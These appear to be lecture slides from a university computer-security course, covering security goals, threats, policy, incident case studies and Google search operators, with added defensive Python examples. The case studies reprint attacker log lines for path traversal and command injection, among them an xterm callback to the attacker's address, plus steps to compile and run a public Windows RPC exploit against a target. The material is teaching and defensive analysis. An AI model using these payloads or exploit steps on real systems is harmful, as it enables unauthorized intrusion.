Computer System Security (Keamanan Sistem Komputer), RUDI LUMANTO, UNIVERSITAS BUDILUHUR, Even Semester 2008/2009

KSK Class1 - Overview and Google Hacking


Page 1: KSK Class1 - Overview and Google Hacking

Computer System Security (Keamanan Sistem Komputer)

RUDI LUMANTO

UNIVERSITAS BUDILUHUR

Even Semester 2008/2009

Page 2: KSK Class1 - Overview and Google Hacking

References and Contact Info

References:
- Matt Bishop, “Computer Security: Art and Science”, Addison-Wesley, 2003, 1084 pages.
- Deborah Russell, G.T. Gangemi Sr., “Computer Security Basics”, O’Reilly & Associates
- John E. Canavan, “Fundamentals of Network Security”, Artech House
- Internet

CONTACT: RUDI [email protected]
0815-1036-9754
Universitas Budiluhur
SATURDAY 13:15-15:45

Page 3: KSK Class1 - Overview and Google Hacking

GRADING CRITERIA

ASSIGNMENTS (2-4 reports): 10%
MIDTERM EXAM: 40%
ATTENDANCE: 10%
FINAL EXAM: 40%

Page 4: KSK Class1 - Overview and Google Hacking

SYLLABUS

Overview / Introduction to Computer System Security
Operating System/Software Security
Physical/Hardware Security
Network/Internet Security
Software threats: viruses, worms, etc.
Internet threats: TCP attacks, DNS, DoS, etc.

Page 5: KSK Class1 - Overview and Google Hacking

SYLLABUS

Firewall
Intrusion Detection System (IDS)
Introduction to Cryptography
Cryptography Applications
Kerberos Scheme
VPN
Leak Analysis

Page 6: KSK Class1 - Overview and Google Hacking

COMPUTER SYSTEM SECURITY

OVERVIEW
Software Security
Hardware Security
Network Security
Software threats: Virus, Worm, etc.
Internet threats: TCP Attack, DOS, DNS, etc.
Firewall
Basic Cryptography
Cryptography Applications
Kerberos Scheme
VPN
Leak Analysis

Page 7: KSK Class1 - Overview and Google Hacking

COMPUTER SYSTEM SECURITY

1. OVERVIEW

Page 8: KSK Class1 - Overview and Google Hacking

Outline

Why Computer Security?
Computer Security Goals
Threats, Vulnerabilities, Attacks
Policy and measure
Simple cases and tools
Making a good security policy

Page 9: KSK Class1 - Overview and Google Hacking

Why Computer Security

To protect company/individual assets
  - Hardware, software and INFORMATION (data, ability and reputation)
To gain a competitive advantage
  - How many people will use a bank’s internet banking system if they knew that the system had been hacked in the past?
To comply with regulatory requirements
To keep your job

Page 10: KSK Class1 - Overview and Google Hacking

Computer Security Goals

Confidentiality
Integrity
Availability

Confidentiality: Prevention of unauthorized access to data, and accidental data disclosures.

Integrity: Prevention of improper modifications of the data, either intentionally or accidentally.
1) Modification of the data by unauthorized parties.
2) Operation on data by authorized personnel in ways that are incompatible with the nature (syntax) of the data, leading to its corruption.
3) Any modification to append-only records, to alter their evidence value.

Availability: Measures to protect data should not result in making it cumbersome to access and modify the data in ways in which it was intended.

Page 11: KSK Class1 - Overview and Google Hacking

Threats, Vulnerabilities and Attacks

THREATS
Anything that can disrupt the operation, functioning, integrity or availability of a computer system.

Stand-alone threats
  - Threats that arise without any connection to other systems. Ex: virus, password cracker
Connection threats
  - Threats that arise because of connection to other systems

Page 12: KSK Class1 - Overview and Google Hacking

◆Threats Arising from Connection to Other Computers

Information leaks
• A database of customer information, including credit card numbers, is leaked from an Internet service provider.
Falsification
• The contents of the web site of a public institution are rewritten with the political messages of a dissident group.
Denial of services
• A bookshop site is attacked and its server goes down, discontinuing service.
Impersonation
• An intruder fakes a membership site for the purchase of merchandise.
Attack platform
• A corporate network administering a server used as a platform for attacking other sites was sued for compensation for the damage caused.

Page 13: KSK Class1 - Overview and Google Hacking

Vulnerabilities

Weakness in the design, configuration or implementation of a computer system that renders it susceptible to a threat.

1. POOR DESIGN
Hardware and software systems that contain design flaws that can be exploited. Ex: sendmail flaws in early versions of Unix that allowed hackers to gain privileged root access.

2. POOR IMPLEMENTATION
Systems that are incorrectly configured because of inexperience, insufficient training or sloppy work. Ex: a system that does not have restricted access privileges on critical executable files.

3. POOR MANAGEMENT
Inadequate procedures and insufficient checks and balances. Ex: no documentation and monitoring.

Page 14: KSK Class1 - Overview and Google Hacking

Critical Vulnerabilities and Vulnerability Scanning

Certain security vulnerabilities are declared critical when they are being (or are about to be) actively exploited and represent a clear and present danger.
Upon notification of a critical vulnerability, systems must be patched by a given date or they will be blocked from network access.

Page 15: KSK Class1 - Overview and Google Hacking

◆Types of Vulnerability

| OS/Program name | Cause | Influence |
|---|---|---|
| Index Server (Windows NT), Index Service (Windows 2000) | ISAPI extension idq.dll overflow | Local system permission seized by an outsider |
| telnetd (FreeBSD 4.3 and earlier, Red Hat 7.1 and earlier, etc.) | Buffer overflow during AYT optional packet processing | Telnetd permission (normally root) seized by an outsider |
| sadmind (Solaris 2.3 – 7) | Buffer overflow during NETMGT_PROC_SERVICE request processing | Command executable with root permission by an outsider |
| SSH 1.2.31, OpenSSH 2.2 and earlier | Overflow in an int variable in detect_attack function | Command executable with root permission by an outsider |
| dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.) | Buffer overflow in a shared library | Arbitrary command executable with root permission by an outsider |
| Bind 8.2x (Red Hat, Turbolinux, Solaris, AIX, etc.) | Buffer overflow during TSIG processing | Operation permission (normally root) seized by an outsider |
| wu-ftpd 2.6.0 and earlier (Red Hat Linux 6.2 and earlier, etc.) | Format string bug in site-exec and setproctitle functions | Execution permission (normally root) seized by an outsider |
| IIS 4.0 (Windows NT), IIS 5.0 (Windows 2000) | Access to a file outside root directory permitted when path name is UNICODE | Shell command executed with IUSR_Machinename permission by an outsider |

Page 16: KSK Class1 - Overview and Google Hacking

ATTACKS

A specific technique used to exploit a vulnerability. Ex: a threat could be a denial of service, a vulnerability is in the design of the OS, and an attack could be a “ping of death”.

Passive attacks
  - Gathering information by monitoring and recording traffic on the network, or by social engineering. Ex: packet sniffing, traffic analysis
Active attacks
  - Overt actions on the computer system.

Page 17: KSK Class1 - Overview and Google Hacking

◆Denial of Service

[Diagram labels: Attack platform; Start attack!!; Target host: Service downed; Target host: Service downed due to overload]
• Large volume data
• Packets causing a system down

Page 18: KSK Class1 - Overview and Google Hacking

Policy and Measure

Security Trinity: foundation for all security policies and measures that an organization develops and deploys.

What is Security?
Definitions from the Amer. Herit. Dic.:
- Freedom from risk or danger; safety.
- Measures adopted .... to prevent a crime.

[Diagram labels: Security, Prevention]

Computer Security Measures
- Mechanisms to prevent, detect and recover from threats and attacks, or for auditing purposes.

Page 19: KSK Class1 - Overview and Google Hacking

Key point

Computer security is not only a technical problem; it is a business and people problem.

The technology is the easy part; the difficult part is developing a security policy/plan that fits the organization’s business operation and getting people to comply with the plan.

Social engineering: non-technical methods hackers employ to gain access to a system; refers to the process of convincing a person to reveal information.

Page 20: KSK Class1 - Overview and Google Hacking

Security operations

- Prevention against accidental capture or modification of information
- Detection of all improper access to data and system resources
- Recovery from unauthorized access, restoring data values, system integrity, etc.

Policies and Procedures
- User privileges
- Data backup
- Security tools to deploy
- Monitoring the integrity
- Response to incident
- User role, etc.

Page 21: KSK Class1 - Overview and Google Hacking

◆Types of Users

Hacker: A user who tries to obtain access using advanced knowledge and techniques.
Cracker: A user who attempts sabotage and other subversive activities with malicious motives.
Script kiddy: A user who has little technical capability and uses tools available on the Internet when attempting cyber attacks.

[Diagram labels: Corporate network; Vulnerability; Intrusion, subversion, sabotage; Subversion, sabotage]

Page 22: KSK Class1 - Overview and Google Hacking

◆Integrity Check Tool

/etc/passwd file → hash value (MD5): dc577ef5f97b671781c04425737bc4df

After file editing/falsification → hash value (MD5): b0ed782bbd4c8445f07538a3ede788eb

Mismatch ... Altered!!
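
The integrity check on this slide, as an added Python example that is not part of the original slides: it records a baseline digest per monitored file and later reports each file as ok, altered or missing. It uses SHA-256 where the slide shows MD5, because MD5 collisions are practical; the temporary files and their contents are constructed stand-ins for /etc/passwd.

```python
import hashlib
import os
import tempfile


def file_digest(path, algorithm="sha256", chunk_size=65536):
    """Hash a file in chunks so large files do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths, algorithm="sha256"):
    """Record the known-good digest of every monitored file."""
    return {p: file_digest(p, algorithm) for p in paths}


def check_against_baseline(baseline, algorithm="sha256"):
    """Return {path: status} where status is 'ok', 'altered' or 'missing'."""
    report = {}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            report[path] = "missing"
        elif file_digest(path, algorithm) != expected:
            report[path] = "altered"
        else:
            report[path] = "ok"
    return report


def demo():
    """Constructed demo: baseline three stand-in files, then tamper with two."""
    with tempfile.TemporaryDirectory() as tmp:
        passwd = os.path.join(tmp, "passwd")   # stand-in for /etc/passwd
        hosts = os.path.join(tmp, "hosts")
        motd = os.path.join(tmp, "motd")
        with open(passwd, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/bash\n")
        with open(hosts, "w") as fh:
            fh.write("127.0.0.1 localhost\n")
        with open(motd, "w") as fh:
            fh.write("welcome\n")

        baseline = build_baseline([passwd, hosts, motd])

        # Simulated falsification: one file gains a line, one file is deleted.
        with open(passwd, "a") as fh:
            fh.write("extra:x:1001:1001::/home/extra:/bin/bash\n")
        os.remove(hosts)

        report = check_against_baseline(baseline)
        return {os.path.basename(p): status for p, status in report.items()}


if __name__ == "__main__":
    print(demo())
```

Keep the baseline on read-only or off-host storage, since an intruder who can edit a monitored file can usually edit a baseline stored beside it.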

Page 23: KSK Class1 - Overview and Google Hacking

◆Security Tools and Security Products

[Diagram labels: Malicious user, Internet, Corporate network, Server/client]

Countermeasures against hacking

Network security
• Router (Filtering)
• Firewall (VPN)
• N-IDS
• Vulnerability audit

Server security
• H-IDS
• Log monitoring
• Falsification prevention
• Vulnerability audit

Miscellaneous
• Virus scan
• Encryption (SSH)

Page 24: KSK Class1 - Overview and Google Hacking

◆Firewall?

[Diagram labels: Internet, Intranet, Public WWW server, Public FTP server, Client, Server, Authentication, GW type firewall; numbered flows: ① HTTP, ② HTTP, ③ FTP, ④ HTTP, ⑤ Unspecific AP]

• Packet filtering
• Application gateway
• Stateful inspection

Page 25: KSK Class1 - Overview and Google Hacking

◆Encryption

VPN (Virtual Private Network) = Leased Line, e.g. IPsec, IPv6

[Diagram labels: the Internet, Internet IX, Provider A, Provider B, Provider C, Provider D, FW/VPN router, Remote access user, Encrypted communication]

Page 26: KSK Class1 - Overview and Google Hacking

Response to Computer Security Incidents

Mandatory incident reporting;
  - Report all suspicious activity. Ex:
    • If urgent, to Computer Helpdesk
    • Or to system manager (if immediately available);
    • Non-urgent to [email protected];
  - Incidents investigated by Computer Incident Response Team (CIRT);
  - Not to be discussed!

Page 27: KSK Class1 - Overview and Google Hacking

CIRT (Computer Security Incident Response Team)

Security experts drawn from throughout the lab
Investigate (“triage”) initial reports;
Coordinate investigation overall;
Work with local system managers;
Call in technical experts;
May take control of affected systems;
Maintain confidentiality;

Page 28: KSK Class1 - Overview and Google Hacking

Other Rules for General Systems

Warning system;
  - First time warning, repeat offense disciplinary action;
Unauthorized or malicious actions;
  - Damage of data, unauthorized use of accounts, denial of service, etc., are forbidden;
Ethical behavior;
  - Same standards as for non-computer activities;
Restricted central services;
  - May only be provided by Computing Division;
Security & cracker tools;
  - Possession (& use) must be authorized;

Page 29: KSK Class1 - Overview and Google Hacking

User role

Guard against malicious code in email
  - Don’t open attachments unless you are sure they are safe
  - Don’t trust who email is from
  - Updated and enabled virus signatures
Guard against malicious code from web browsing

Page 30: KSK Class1 - Overview and Google Hacking

User role - 2

Obey Strong Authentication Policy (Kerberos)
  - Don’t run network services (login or read/write ftp) unless they demand Kerberos authentication
  - Treat your Kerberos password as a sacred object (never expose it over the network)
Promptly report potential computer security incidents
  - Ex: call by telephone or email to [email protected] (if in US)
  - Follow CIRT instructions during incidents (especially about keeping infected machines off the network and preserving the status of an infected machine for expert investigation)

Page 31: KSK Class1 - Overview and Google Hacking

Example of Policy Issues

Data backup
Incidental use
Privacy
Offensive material
Licensing

Page 32: KSK Class1 - Overview and Google Hacking

Data Backup Policy - Users

  - Users (data owners) responsible for determining:
    • What data requires protection;
    • How destroyed data would be recovered, if needed;
    • Coordinating backup plan w/ sysadmins;
      - or doing their own backups;
    • If the backup is done for you it might be worth occasionally checking that you can really retrieve the data

Page 33: KSK Class1 - Overview and Google Hacking

Privacy of Email and Files

May not use information in another person’s files seen incidental to any activity (legitimate or not) for any purpose w/o either explicit permission of the owner or a “reasonable belief the file was meant to be accessed by others.”
  - Whether or not group/world accessible;
  - “Group” files implicitly may be used by the group for the mission of the group;

Page 34: KSK Class1 - Overview and Google Hacking

A simple case and tool (seeing the technique/information behind a case)

Page 35: KSK Class1 - Overview and Google Hacking

A Security Case

A company called “Acme-art. Inc” does online business on the Internet. They have a database that records all customer information, including credit card information, and is connected to their site www.acme-art.com, which is protected by a firewall.
On 31 October 2001 a hacker intruded into their system and stole all the credit card information, then posted the information to a Usenet newsgroup. A few hours later the company had suffered million-dollar losses and a bad reputation, and had to invest much more money to keep their business alive.

What happened? How could it happen?

Fact: The firewall is installed, and Internet access can only be done through HTTP port 80.

Page 36: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

Looking for clues in log file…

A
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

B
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

C
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

D
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

E
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

F
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
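
One way to automate the log review on this slide, as an added Python example that is not part of the original slides: it parses access-log entries taken from parts A to F and labels the requests a reviewer should look at. The rule names and the `classify`, `analyze` and `flagged_per_source` functions are this example's own.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Access-log entries from the slide (Apache common log format).
SAMPLE_LOG = """\
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
SHELL_META = re.compile(r"[|;&`]|\$\(")    # characters a shell or pipe-open acts on
CONTROL = re.compile(r"[\x00-\x1f\x7f]")   # decoded %0a, %0d, %00 and similar


def classify(target, status):
    """Return the rule labels that match one request target and status code."""
    findings = []

    def add(label):
        if label not in findings:
            findings.append(label)

    # parse_qsl percent-decodes values, so %0a and %26 are checked as characters.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if value == "":
            add("empty-parameter")         # part D: probing with no value
        if ".." in re.split(r"[\\/]", value):
            add("path-traversal")          # part E
        if SHELL_META.search(value):
            add("shell-metacharacter")     # part F
        if CONTROL.search(value):
            add("control-character")       # part F: newline-separated commands
    if status == 403:
        add("forbidden-probe")             # part C: direct request for /cgi-bin/
    return findings


def analyze(log_text):
    """Return one record per log line that matched at least one rule."""
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue                       # not a common-log-format line
        status = int(m.group("status"))
        findings = classify(m.group("target"), status)
        if findings:
            flagged.append({"ip": m.group("ip"), "time": m.group("ts"),
                            "target": m.group("target"), "status": status,
                            "findings": findings})
    return flagged


def flagged_per_source(flagged):
    """Count flagged requests per client address."""
    return dict(Counter(entry["ip"] for entry in flagged))


if __name__ == "__main__":
    for entry in analyze(SAMPLE_LOG):
        print(entry["time"], entry["status"],
              ",".join(entry["findings"]), entry["target"])
```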

Page 37: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

Part A in log file

10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

Browsing …….

Page 38: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

Part B in log file

10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

Browsing …….

Page 39: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

Part C in log file

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

Trying direct access ….

Error response

Page 40: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

Part D in log file

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

Attacking …

Security Hole 1

Page 41: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

[Slide image: Perl script]

Security hole 1: validation of the parameter variable that is passed to the index.cgi script

Page 42: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

Part E in log file

10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

Attacking …

Security Hole 1

Retrieving the passwd file

Page 43: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

Passwd file

root:x:0:0:root:/root:/bin/bash
………………
Lion:x:500:500::/home/lion:/bin/bash

Security hole 1 effect: retrieving the important “passwd” file

Page 44: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

Part F in log file

10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

Attacking …

Security Hole 2

Direct execution of server commands

Page 45: KSK Class1 - Overview and Google Hacking

Security team investigation: Sample case 1

10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
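
A hardened handling of the `page` parameter that closes both security holes, as an added Python example; it is not the site's Perl script, which this transcript does not reproduce. It assumes index.cgi maps `page` to a file under the document root; `resolve_page`, `render` and the temporary document root are hypothetical names and constructed data.

```python
import os
import re
import tempfile

# Allowlist for page names: letters, digits, "_" and "-", ending in .shtml.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.shtml")

# Decoded `page` values seen in log parts B, D, E and F.
LOGGED_VALUES = [
    "falls.shtml",
    "",
    "/../../../../../../../../../etc/passwd",
    "|ls -la /\nid\nwhich xterm|",
    "|xterm -display 10.0.1.21:0.0 &|",
]


class RejectedPage(ValueError):
    """Raised when the page parameter must not be served."""


def resolve_page(doc_root, page):
    """Map `page` to a regular file under doc_root, or raise RejectedPage."""
    # 1. Syntax: anything that is not a plain page name is refused outright,
    #    which removes "/", "..", "|", newlines and the empty string at once.
    if not isinstance(page, str) or not PAGE_NAME.fullmatch(page):
        raise RejectedPage("name does not match the allowed pattern")
    # 2. Location: resolve symlinks and confirm the result is still inside
    #    the document root (covers a link planted inside the root).
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, candidate]) != root:
        raise RejectedPage("resolves outside the document root")
    # 3. Existence: only regular files are served.
    if not os.path.isfile(candidate):
        raise RejectedPage("no such page")
    return candidate


def render(doc_root, page):
    """Return (status, body) for a request carrying this page parameter."""
    try:
        path = resolve_page(doc_root, page)
    except RejectedPage:
        return 400, "Bad request"          # no detail about the reason is echoed
    # Plain file read: the value never reaches a shell or a pipe-style open.
    with open(path, "r", encoding="utf-8") as fh:
        return 200, fh.read()


def demo():
    """Replay the logged parameter values against a constructed document root."""
    with tempfile.TemporaryDirectory() as doc_root:
        with open(os.path.join(doc_root, "falls.shtml"), "w", encoding="utf-8") as fh:
            fh.write("<h1>Falls</h1>")
        return [render(doc_root, value)[0] for value in LOGGED_VALUES]


if __name__ == "__main__":
    print(demo())
```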

Page 46: KSK Class1 - Overview and Google Hacking

Information/technique behind the case

Information about target
HTTP structure
CGI/PERL
LINUX system and its commands

Page 47: KSK Class1 - Overview and Google Hacking

Httpd default file structure: what is the web site structure?

[Directory-tree diagram for host Lisv01. Labels: / (root); home, var, sbin, bin, dev, etc, usr, …; u01, u02, u03, …; www, httpd, init.d, log; public_html (default user’s directory); html (default document root); conf; httpd; httpd.conf]

* Document root: The directory that holds HTML documents.

Page 48: KSK Class1 - Overview and Google Hacking

Behind the Web

[Diagram: three panels, each showing a WWW browser and a WWW server (WWW server software, Application) connected over the Internet/Intranet, with an "Execute application" label]
Client-side application: HTML & Script, JavaScript
Network-loading application: Java Applet, ActiveX
Server-side application: CGI, Active Server Pages

Page 49: KSK Class1 - Overview and Google Hacking

Sample case 2

Page 50: KSK Class1 - Overview and Google Hacking

Sample case 2

After a period of new recruitment, a server in a company suddenly crashed. The company network became unavailable for a while, which led to a large loss in production.

What happened? How could it happen?

No log file indication!!!

Page 51: KSK Class1 - Overview and Google Hacking

Security team investigation: Looking for clues by social engineering

Sample case 2

One new employee installed Windows 2000 Server on his computer and connected it to the LAN with a global IP address.

Other clues:
1. Nessus report on vulnerabilities in Windows 2000
2. Exploit program available

Nessus report on Windows 2000 server after IIS installation: Analysis of Host

| Address of Host | Port/Service | Issue regarding port |
|---|---|---|
| 192.168.27.31 | ftp (21/tcp) | Security hole found |
| 192.168.27.31 | smtp (25/tcp) | Security hole found |
| 192.168.27.31 | http (21/tcp) | Security hole found |
| 192.168.27.31 | nntp (119/tcp) | Security hole found |
| 192.168.27.31 | msrpc (135/tcp) | Security hole found |
| 192.168.27.31 | Netbios-ssn (139/tcp) | Security not found |
| 192.168.27.31 | https (443/tcp) | Security not found |
| 192.168.27.31 | Microsoft-ds (445/tcp) | Security hole found |
| …… | …. | …. |

Page 52: KSK Class1 - Overview and Google Hacking

NESSUS report in detail

Sample case 2

Other references: IAVA:2003-A-0012
NESSUS ID: 11835

Vulnerability, msrpc (135/tcp):
The remote host is running a version of Windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability. Namely, the MsBlaster worm.
Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE: CAN-2003-0352
BID: 8205
Other references: IAVA:2003-A-0011
NESSUS ID: 11806

Warning, msrpc (135/tcp):
Distributed Computing Environment (DCE) services running on the remote host

Page 53: KSK Class1 - Overview and Google Hacking

Sample case 2

NESSUS ID: Identity number of the vulnerability check by NESSUS
BID: Bugtraq ID: related documentation regarding the vulnerability, including exploit code; see the SecurityFocus site

Simulation

1. Downloading the exploit code source file (from the SecurityFocus site or Whoppix CD)
$ cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
2. Compiling the source file
$ gcc oc192-dom.c
3. Executing the exploit against the IP of the target machine
$ a.out -d 192.168.94.204

Get the system access

C:>WINNT\SYSTEM32\

Page 54: KSK Class1 - Overview and Google Hacking

Information/technique behind the case

- Insufficient security orientation for new employees
- Lack of knowledge about the OS
- There is always exploit code on the Internet
- Lack of information about updates

Page 55: KSK Class1 - Overview and Google Hacking

Sample case 3

What kind of security techniques are behind it?

Page 56: KSK Class1 - Overview and Google Hacking

The warrior of the NET


Page 57: KSK Class1 - Overview and Google Hacking

Making a good security policy

Page 58: KSK Class1 - Overview and Google Hacking

Making a good security policy

Penetration Test/Ethical Hacking
  - Understanding what is inside the hacker's mind
Security Trinity
Security Goals

Page 59: KSK Class1 - Overview and Google Hacking

Definition of "Ethical Hacking"

Ethical hacking is where a computer and network expert attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing, and red teaming. An individual involved in ethical hacking is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat.

One of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.

Page 60: KSK Class1 - Overview and Google Hacking

Inside the Hacker's Mind

- Successfully attack and Save -

Focus on the target
Never use your own information
Never leave your footprints
Can always come back again

HACKERS PROCEDURE

Page 61: KSK Class1 - Overview and Google Hacking

Hackers Procedure/step

Steps:
Targeting
Scanning
Remote Attack
Local Attack
Log removing / deception
Space using
Time stamp
Back door

Phases:
1. Information gathering
2. Attack, intrusion
3. Unauthorized act
4. Actions taken after unauthorized act

Page 62: KSK Class1 - Overview and Google Hacking

Example of Targeting

All Informations about the target

Technique name : Web browser targetingGoals : personal information about the targetOperation base any web browser with search engine siteOperation base - any web browser with search engine site

(google)- online database (WHOIS, IP-CONVERSION,etc)

Location, related company/organization, news, telephone number,Contact (mail address), web author idea/though,/behaviour, site software


Page 63: KSK Class1 - Overview and Google Hacking

Targeting with google

By using the basic search techniques combined with Google's advanced operators, anyone can perform information-gathering and vulnerability-searching using Google. This technique is commonly referred to as Google hacking.


Page 64: KSK Class1 - Overview and Google Hacking

Google hacking

Mastering Google using its standard options
– Double quotation …. makes the keywords be recognized as a phrase
– Hyphen (-) …. excludes pages that contain the keyword
– site: …. searching only inside the site
– * …. wildcard. Use inside double quotation to stand for any word
– intitle: …. search limited only to the web page title
– inurl: …. search limited only to the web page URL
– intext: …. search limited only to the main text of the web page
– filetype: …. search focusing on the extension type of the file
– phonebook: …. search telephone number

Page 65: KSK Class1 - Overview and Google Hacking

Google hacking
Mastering Google using its options
– site: …. searching only inside the site

“hacker” site:www.cnn.com or site:www.cnn.com hacker

This query searches for the word hacker, restricting the search to the http://www.cnn.com web site. How many pages on the CNN web server contain the word hacker?


Page 66: KSK Class1 - Overview and Google Hacking

Google hacking
Mastering Google using its options
– * …. wildcard. Use inside double quotation to stand for any word

“He is a * Hacker”


Page 67: KSK Class1 - Overview and Google Hacking

Google hacking
Mastering Google using its standard options
– intitle: …. search limited only to the web page title

intitle:“Hacker”


Page 68: KSK Class1 - Overview and Google Hacking

Google hacking
Mastering Google using its standard options
– inurl: …. search limited only to the web page URL

inurl:www.securityfocus.com


Page 69: KSK Class1 - Overview and Google Hacking

Google hacking
Mastering Google using its standard options
– intext: …. search limited only to the main text of the web page

intext:“earthquake”


Page 70: KSK Class1 - Overview and Google Hacking

Google hacking
Mastering Google using its standard options
– filetype: …. search focusing on the extension type of the file

“hacking” filetype:ppt
"whoppix" filetype:iso


